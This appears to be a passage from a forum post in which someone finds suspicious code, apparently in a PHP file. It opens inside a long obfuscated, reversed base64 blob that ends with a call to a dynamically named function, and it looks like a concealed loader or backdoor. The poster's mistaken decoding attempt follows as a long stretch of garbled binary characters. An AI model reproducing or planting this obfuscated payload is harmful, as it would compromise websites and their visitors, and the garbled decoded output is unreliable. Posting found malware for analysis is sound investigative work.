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")));$HTIRyzRYNNT();?>
Now, to me, that last line looks like it contains some base64 string.
Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).
+D+H7EοΏ½+LοΏ½QοΏ½οΏ½οΏ½οΏ½ΤοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½@οΏ½οΏ½ΥοΏ½οΏ½^οΏ½ΩοΏ½οΏ½]οΏ½ΥοΏ½
ΨοΏ½ΤοΏ½οΏ½
ά§οΏ½&οΏ½+LοΏ½οΏ½ΫUοΏ½+D&H6οΏ½έ¦οΏ½ν
οΏ½οΏ½οΏ½οΏ½οΏ½T&οΏ½οΏ½T&οΏ½οΏ½@οΏ½οΏ½ΥοΏ½οΏ½^οΏ½ΩοΏ½οΏ½]οΏ½ΥοΏ½
ΨοΏ½ΤοΏ½οΏ½
ά§οΏ½&D+LοΏ½οΏ½ΫUοΏ½&H6οΏ½Κ
QΙ²HοΏ½οΏ½οΏ½Ι‘AοΏ½οΏ½ΩοΏ½οΏ½οΏ½οΏ½οΏ½ΛοΏ½οΏ½οΏ½οΏ½ΙοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½QΙ‘AοΏ½οΏ½ΩοΏ½οΏ½οΏ½οΏ½οΏ½ΛοΏ½οΏ½IΙοΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½έοΏ½QοΏ½οΏ½]έοΏ½ΛDοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½ οΏ½οΏ½οΏ½ήΡοΏ½AοΏ½οΏ½ΩοΏ½οΏ½οΏ½οΏ½οΏ½ΛοΏ½οΏ½ΕοΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΓοΏ½οΏ½ΨοΏ½UοΏ½οΏ½οΏ½οΏ½ΘοΏ½έ οΏ½οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½ΙοΏ½]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ²T&H6οΏ½Κ§IHοΏ½έοΏ½οΏ½ΪοΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά¦οΏ½οΏ½UοΏ½&H6οΏ½Θ₯MοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½T+H6οΏ½+D&D+LοΏ½QοΏ½οΏ½οΏ½οΏ½ΤοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&D+H7EοΏ½&D+LοΏ½
άοΏ½Ι°
ΩοΏ½Ι°οΏ½ΪΊQοΏ½οΏ½οΏ½ΤοΏ½οΏ½ΩYοΏ½}]οΏ½οΏ½ΧΩοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½&D&οΏ½οΏ½IHοΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩοΏ½οΏ½&D&H6οΏ½οΏ½οΏ½
άοΏ½οΏ½οΏ½ΜοΏ½ΤοΏ½\οΏ½OsQοΏ½οΏ½οΏ½Λ£ΜοΏ½
ΩοΏ½οΏ½&D&H6οΏ½οΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YΨοΏ½οΏ½οΏ½ΥοΏ½οΏ½YοΏ½QοΏ½}]οΏ½οΏ½QοΏ½οΏ½XοΏ½ΤοΏ½&D&H6οΏ½ΧMοΏ½οΏ½ΩοΏ½οΏ½oΩοΏ½QοΏ½οΏ½οΏ½ΪΊQοΏ½οΏ½D&D+LοΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½Ι§Ψp]οΏ½sοΏ½οΏ½οΏ½οΏ½οΏ½
OοΏ½οΏ½οΏ½pQοΏ½sάοΏ½MοΏ½οΏ½οΏ½οΏ½&D&H6οΏ½Κ€οΏ½οΏ½οΏ½Ϊ½ήΘ±
ΨοΏ½οΏ½οΏ½οΏ½οΏ½ά οΏ½οΏ½T&H6οΏ½οΏ½@οΏ½οΏ½ΥοΏ½οΏ½^οΏ½ΩοΏ½οΏ½]οΏ½ΥοΏ½
ΨοΏ½ΤοΏ½οΏ½
ά§οΏ½&D+H6οΏ½οΏ½οΏ½οΏ½οΏ½T&οΏ½οΏ½T&H6οΏ½έ¦οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½Υ&D&H6οΏ½οΏ½T&D+D&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½R:Q}Q$οΏ½S%XοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&H6οΏ½Κ―οΏ½οΏ½οΏ½οΏ½οΏ½@Θ₯οΏ½οΏ½QοΏ½οΏ½ΩοΏ½οΏ½οΏ½οΏ½ΟοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½Ω&D&D+D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½ οΏ½οΏ½οΏ½ήΡοΏ½EοΏ½οΏ½Θ°οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά°οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UΩXοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&οΏ½οΏ½DοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UΩ¬ΥοΏ½οΏ½οΏ½ οΏ½οΏ½οΏ½ήέοΏ½XοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&οΏ½οΏ½DοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&H6οΏ½ΚΨ°ΫΙ±AοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½\οΏ½οΏ½ΟΨ°ΫοΏ½&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½ήΙοΏ½οΏ½QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&H6οΏ½οΏ½οΏ½οΏ½οΏ½T&D+D&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&D+LοΏ½οΏ½οΏ½οΏ½ΙοΏ½ΟΙοΏ½QοΏ½οΏ½οΏ½ΨIHΛοΏ½oΩοΏ½QοΏ½οΏ½
οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½&D&H6οΏ½Κ¦DοΏ½οΏ½οΏ½ΫοΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½άοΏ½\οΏ½οΏ½οΏ½DοΏ½tοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½T&D+LοΏ½οΏ½ΫUοΏ½&D+LοΏ½QοΏ½οΏ½οΏ½έΉQοΏ½οΏ½έοΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½T&D+LοΏ½ήΙ‘AοΏ½οΏ½ΥοΏ½οΏ½MοΏ½MοΏ½οΏ½οΏ½οΏ½ΣοΏ½ΣοΏ½οΏ½οΏ½Ϋ½οΏ½&D&H6οΏ½Κ§IHοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½ΜοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½&D&οΏ½+LοΏ½DοΏ½οΏ½οΏ½Ϋ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½&D+H7EοΏ½οΏ½@οΏ½οΏ½οΏ½Ι οΏ½ΩUοΏ½οΏ½XοΏ½οΏ½DΘ°YοΏ½οΏ½οΏ½οΏ½οΏ½Κ°YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½Ι’
οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½έΉQοΏ½οΏ½έοΏ½οΏ½οΏ½HοΏ½AοΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½AοΏ½οΏ½έΉQοΏ½οΏ½έοΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½έοΏ½οΏ½ΡοΏ½οΏ½YοΏ½TοΏ½οΏ½QοΏ½ΣοΏ½ΣοΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½AοΏ½οΏ½έΉQοΏ½οΏ½έοΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά¦οΏ½οΏ½UοΏ½&H6οΏ½Θ₯
ΫοΏ½οΏ½οΏ½οΏ½&H6οΏ½ΧοΏ½ΪΊQοΏ½}QοΏ½οΏ½οΏ½Ϋ€οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΪΊQοΏ½}QοΏ½οΏ½οΏ½Ϋ₯οΏ½οΏ½ οΏ½οΏ½οΏ½ήΡοΏ½οΏ½οΏ½οΏ½έοΏ½UΟοΏ½οΏ½οΏ½UΩ¬ΥοΏ½οΏ½ΧοΏ½οΏ½οΏ½ά€οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½IHοΏ½οΏ½οΏ½οΏ½oΩοΏ½QοΏ½TΩ±οΏ½οΏ½οΏ½tοΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½tοΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΨοΏ½tοΏ½οΏ½οΏ½QοΏ½YoΩοΏ½QοΏ½\ΪQοΏ½Q οΏ½IHοΏ½οΏ½οΏ½οΏ½UΩ¬οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ οΏ½οΏ½οΏ½ήΡ&H6οΏ½Κ₯οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½}ΝοΏ½ΨοΏ½οΏ½QοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½\ΫοΏ½οΏ½οΏ½οΏ½ΚοΏ½οΏ½οΏ½Ϋ°ΩοΏ½Κ₯οΏ½οΏ½οΏ½οΏ½έΩοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½ΝοΏ½οΏ½HοΏ½ΘοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩXΩοΏ½Κ§οΏ½οΏ½QοΏ½οΏ½οΏ½ΣοΏ½ΣοΏ½οΏ½οΏ½]οΏ½έοΏ½οΏ½οΏ½
οΏ½οΏ½οΏ½QοΏ½}ΝοΏ½ΨοΏ½Ψ°ΫοΏ½&H6οΏ½Μ―A^οΏ½UΝQοΏ½mοΏ½οΏ½οΏ½HΩΡ&H6οΏ½οΏ½οΏ½
ΫοΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½YοΏ½οΏ½οΏ½ΛοΏ½οΏ½UοΏ½οΏ½έYοΏ½οΏ½οΏ½άοΏ½οΏ½οΏ½οΏ½οΏ½έοΏ½ΡοΏ½ΡοΏ½QοΏ½οΏ½ΩοΏ½ΩQοΏ½οΏ½Ω²YοΏ½οΏ½UοΏ½ΩοΏ½οΏ½οΏ½έοΏ½οΏ½άοΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½έοΏ½
οΏ½οΏ½οΏ½άοΏ½οΏ½οΏ½Ψ΄MοΏ½οΏ½Ω±έοΏ½έοΏ½οΏ½οΏ½οΏ½Ψ·οΏ½YοΏ½οΏ½ά οΏ½οΏ½T+LοΏ½DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½ΡδοΏ½ΫΌΩqYοΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½ΫΌΩrοΏ½οΏ½UοΏ½ΜοΏ½οΏ½UοΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½έοΏ½Ω»οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½ΫΌΩqοΏ½οΏ½οΏ½οΏ½ΡοΏ½ΡοΏ½Qί ΩοΏ½]οΏ½οΏ½QοΏ½οΏ½YοΏ½οΏ½ΫΫΌΩsοΏ½οΏ½ΫΌΩrέοΏ½ΫΌΩsοΏ½οΏ½οΏ½ΫΌΩqΩοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½οΏ½ΡοΏ½]οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½IHIοΏ½QSοΏ½οΏ½HlοΏ½QXοΏ½QOοΏ½IPά¦UΫοΏ½ΧοΏ½QIYοΏ½WAU οΏ½οΏ½IYI]}οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½tοΏ½οΏ½9]οΏ½TοΏ½U|URlοΏ½QXοΏ½QOοΏ½ITοΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½οΏ½οΏ½@έΌοΏ½οΏ½&H6οΏ½Κ§A^οΏ½UΝQοΏ½mοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά€
οΏ½οΏ½οΏ½&οΏ½&οΏ½οΏ½X6οΏ½Κ¦LοΏ½οΏ½YοΏ½οΏ½έοΏ½οΏ½ΣοΏ½ΣοΏ½οΏ½οΏ½]οΏ½έοΏ½οΏ½οΏ½
οΏ½οΏ½οΏ½QοΏ½}ΝοΏ½Ψ
οΏ½οΏ½Ϊ°UοΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½D+LοΏ½LοΏ½οΏ½YοΏ½οΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½
οΏ½οΏ½οΏ½&οΏ½οΏ½@οΏ½οΏ½YοΏ½οΏ½UοΏ½οΏ½Ρ&οΏ½+LοΏ½οΏ½ΫYοΏ½6οΏ½+D&οΏ½+LοΏ½QοΏ½οΏ½T+H6οΏ½Κ₯έ½οΏ½οΏ½οΏ½Ϊ°UοΏ½οΏ½]οΏ½οΏ½AοΏ½οΏ½ΩοΏ½οΏ½MοΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½T+LοΏ½D&D+@οΏ½οΏ½οΏ½@οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΫΙ‘AοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½@ΘIοΏ½οΏ½οΏ½ΧοΏ½οΏ½οΏ½YοΏ½QοΏ½οΏ½UοΏ½οΏ½Τ&D&H7οΏ½οΏ½οΏ½οΏ½Θ₯ οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½YοΏ½|οΏ½οΏ½οΏ½D&D&οΏ½οΏ½οΏ½Ω₯οΏ½οΏ½οΏ½ΡοΏ½οΏ½ΟΔοΏ½YοΏ½οΏ½YοΏ½οΏ½έοΏ½D&D&οΏ½οΏ½οΏ½WοΏ½WοΏ½οΏ½ΟΔοΏ½YοΏ½οΏ½D&D&οΏ½οΏ½οΏ½QXοΏ½QOοΏ½IοΏ½οΏ½ΟΘοΏ½οΏ½άοΏ½οΏ½&D&D+@οΏ½ΡοΏ½οΏ½ΟΘοΏ½Τ&D&H6οΏ½οΏ½οΏ½άPοΏ½οΏ½Ρ&H6οΏ½οΏ½T+LοΏ½DοΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΫΫΌέοΏ½]οΏ½}QοΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½ΥοΏ½οΏ½MοΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½IοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΟοΏ½XΩοΏ½&H6οΏ½Κ€οΏ½Ω₯οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½@οΏ½οΏ½YοΏ½οΏ½UοΏ½οΏ½Ρ&H6οΏ½ΚHοΏ½οΏ½@ήοΏ½οΏ½οΏ½UοΏ½+D&οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½Μ]KοΏ½οΏ½ΜοΏ½οΏ½οΏ½Υ&H6οΏ½ΚοΏ½οΏ½@ήοΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½X6οΏ½έ¦οΏ½&H6οΏ½Θ»HοΏ½οΏ½οΏ½PUοΏ½ΜοΏ½οΏ½οΏ½Υ&H6οΏ½οΏ½Ε
οΏ½οΏ½οΏ½οΏ½ΫΙ οΏ½έΉQοΏ½οΏ½έ}οΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½ΚοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½ΘΈοΏ½έοΏ½οΏ½οΏ½έοΏ½ΥοΏ½οΏ½^οΏ½οΏ½έοΏ½Ι°HοΏ½ΤοΏ½οΏ½
ά§οΏ½&οΏ½οΏ½DοΏ½οΏ½YΨοΏ½οΏ½οΏ½οΏ½οΏ½ΫΫΌέοΏ½QοΏ½}QοΏ½οΏ½οΏ½οΏ½οΏ½HοΏ½οΏ½ΪΈοΏ½ΫΌΥοΏ½Ω΄οΏ½οΏ½οΏ½QΙ‘ΩοΏ½YοΏ½QοΏ½~QοΏ½οΏ½]οΏ½TοΏ½οΏ½οΏ½Ε
οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ²T+LοΏ½HοΏ½ΤοΏ½οΏ½οΏ½Ω₯οΏ½οΏ½οΏ½ΡοΏ½οΏ½έΉQοΏ½οΏ½έ}οΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½ΚΙΓοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½έοΏ½ΥοΏ½οΏ½^οΏ½οΏ½έοΏ½Ι°HοΏ½ΤοΏ½οΏ½
ά§οΏ½&οΏ½μοΏ½οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩUοΏ½οΏ½ΨοΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½ΜοΏ½οΏ½οΏ½οΏ½οΏ½έD+LοΏ½οΏ½οΏ½οΏ½ΜMQ%οΏ½οΏ½PQA]HοΏ½ΘοΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½XοΏ½ΘοΏ½οΏ½Ι οΏ½οΏ½X6οΏ½οΏ½TοΏ½οΏ½οΏ½οΏ½οΏ½PΩ΅οΏ½οΏ½Ι‘οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+H6οΏ½Κ¦HοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½}ΩοΏ½οΏ½έοΏ½οΏ½ΡοΏ½οΏ½YοΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ι οΏ½οΏ½οΏ½μοΏ½οΏ½+H6οΏ½ΚDοΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½\]οΏ½οΏ½οΏ½XοΏ½οΏ½οΏ½έοΏ½οΏ½ΡοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½6οΏ½+LοΏ½ΔοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΪΆQοΏ½~YάΏUοΏ½οΏ½ΠοΏ½]οΏ½~YοΏ½οΏ½6οΏ½μοΏ½ΩοΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½
